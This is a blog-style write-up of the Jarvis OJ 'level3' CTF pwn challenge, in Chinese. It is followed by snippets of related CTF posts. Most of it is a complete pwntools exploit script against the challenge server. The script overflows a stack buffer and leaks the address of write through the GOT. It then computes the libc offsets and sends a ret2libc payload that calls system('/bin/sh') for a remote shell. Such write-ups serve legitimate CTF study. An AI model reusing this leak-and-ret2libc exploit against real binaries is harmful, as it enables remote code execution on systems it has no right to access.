2. 程式人生 > 其它 >jarvis oj PWN - level3

jarvis oj PWN - level3

阿新 發佈:2021-08-02

思路:
1.使用write 洩漏出 got地址, 通過libc計算偏移得到system, binsh
2.覆蓋ebp返回主函式再次執行
3.這次覆蓋ebp執行system /bin/sh。

關鍵傳參: write_addr, 返回地址, 1, output, 4(4位元組)

from pwn import *

is_debug = False
# is_debug = True
# context(log_level='debug', arch='i386', os='linux')

io = remote("pwn2.jarvisoj.com", 9879)
# io = process('level3')

if is_debug:
    gdb.attach(io, '''
    b *0x08048483
    ''')

e = ELF('level3')
main_addr = e.symbols['vulnerable_function']
write_plt = e.symbols['write']
write_got = e.got['write']

# libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('libc-2.19.so')
libc_write = libc.symbols['write']

junk = (0x88 + 4) * b'a'
payload1 = flat(junk, write_plt, main_addr, 1, write_got, 4)
r = io.recvline()
print('recv is ', r)
io.sendline(payload1)
addr = io.recv()[:4]
true_address = u32(addr)
offset = true_address - libc_write

system = libc.symbols['system'] + offset
sh_addr = libc.search(b'/bin/sh').__next__() + offset
payload2 = flat(junk, system, 1, sh_addr)
io.sendline(payload2)
io.interactive()

相關推薦

jarvis oj PWN - level3

思路: 1.使用write 洩漏出 got地址, 通過libc計算偏移得到system, binsh 2.覆蓋ebp返回主函式再次執行

[Jarvis OJ - PWN]——[XMAN]level3

技術標籤:pwn# Jarvis OJ [Jarvis OJ - PWN]——[XMAN]level3 題目地址:https://www.jarvisoj.com/challenges題目:先checksec一下,32位程式開啟了NX保護。在IDA看下。第一個函式中,有可以棧溢位利用的函式re

[Jarvis OJ - PWN]——[XMAN]level2(x64)

技術標籤:pwn# Jarvis OJ [Jarvis OJ - PWN]——[XMAN]level2(x64) 題目地址:https://www.jarvisoj.com/challenges題目:checksec一下,是64位程式。開啟了NX保護 在IDA看一下,main函式中有我們要的system函式

Jarvis OJ-superexpress

下載附件後,得到了一個py指令碼與一個的文字,如下: problem.py: import sys import re

Jarvis OJ - Web

Login bp抓包,得到hint Hint: \"select * from `admin` where password=\'\".md5($pass,true).\"\'\" php中的md5函式,包含兩個引數:string(必須)、raw(可選)

XCTF-PWN-Level3

XCTF-PWN-Level3 2021年11月9日 9:57 拿到題目之後使用檔案檢視工具發現是32位檔案:

YUEGUANG-OJ

YOJ使用說明 專案參考 青島大學OJ https://qduoj.com 洛谷 https://luogu.org 由於沒有各個OJ的題目集資料(沒錢,所以沒法直接通過喲json進行匯入

CTF-pwn-tips-zh_CN

CTF-pwn-tips-zh_CN 目錄 緩衝區溢位 在 gdb 中查詢字串 讓程式執行在指定埠上 在 libc 中查詢特定的函式偏移量

OJ上的三道Python題

昨天在OJ上做了19級理科大計基的12道題,有兩個始終過不去,今天寫了最後一道,過了。

PWN頭禿之旅 - Linux的保護機制

上篇office漏洞提到了棧溢位,查了下棧溢位屬於PWN範疇,專門找了講棧溢位的資料和書籍來看,嘗試復現經典棧溢位(關閉地址隨機化那種),嘗試了N次,每次都失敗了。>_<。都是卡在計算目標buffer的偏移這裡,反正

luogu P3285 [SCOI2014]方伯伯的OJ splay 線段樹

LINK:方伯伯的OJ 一道稍有質量的線段樹題目.不寫LCT splay這輩子是不會單獨寫的 真的!

327. 區間和的個數 (leetcode 通過60/61個用例,oj通過 待補充)

給定一個整數陣列nums,返回區間和在[lower, upper]之間的個數,包含lower和upper。區間和S(i, j)表示在nums中,位置從i到j的元素之和,包含i和j(i ≤ j)。

[未知OJ]山海經 題解 線段樹

題意:給出一個數列a,每次詢問區間[l..r]的最大連續子段和,以及這個連續子段的兩個端點。如果有多組解,則輸出左端點最小的,如果仍有多組解,則輸出右端點最小的解。

buuctf-pwn babyrop

簡單的32位rop 讀取隨機數並傳入。sub_804871F的返回值作為sub_80487D0的引數 第二個read就是溢位點

PWN頭禿之旅 - 5.經典棧溢位實驗(linux_x86)

前兩天無意間看到一篇大神的文章,裡面講了經典棧溢位,看完之後才發現咱屢戰屢敗的經典棧溢位實驗除了偏移量計算問題,還有另外一個大坑>_<。預感這倆問題解決之後咱的經典棧溢位實驗會迎來曙光~

IO_FILE pwn初步探索

目錄FILE結構偽造vtable劫持程式流程具體用法FSOP具體用法glibc 2.24 下 IO_FILE 的利用新的利用技術fileno與緩衝區的相關利用示例_IO_str_jumpsoverflowfinish內容來源

【講題】Galaxy OJ動態規劃基礎1——T1~T5

動態規劃基礎1 【傳送門】 T1 滑雪 難度:普及-, 做法:記憶化搜尋 首先for一遍起點,分別使用dfs搜尋,搜尋過程記錄答案,大大減少複雜度。

Arm pwn學習

本文首發於“合天智匯”公眾號 作者:s0xzOrln 宣告:筆者初衷用於分享與普及網路知識,若讀者因此作出任何危害網路安全行為後果自負,與合天智匯及原作者無關!

Comet OJ - Contest #8 神奇函式 莫比烏斯反演+尤拉函式

令 $x=\\prod p_{i}^{a_{i}}$ 則 $f(x)=\\prod p_{i}^{\\frac{a_{i}}{2}}$也就是說 $f(x)$ 等於最大的 $y$ 滿足 $y^2|f(x)$$\\sum_{i=1}^{n} f(i)$ 可化為 $\\sum_{i=1}^{ \\sqrt{n}} i \\times g(\\frac{n}{i^2})$其

PTA 乙級 1049 數列的片段和 (20分) C/C++ (更新OJ導致測試點2無法通過,已解決)

還是想了第一版的做法,暴力演算法,超時了 1 #include<iostream> 2 #include<vector>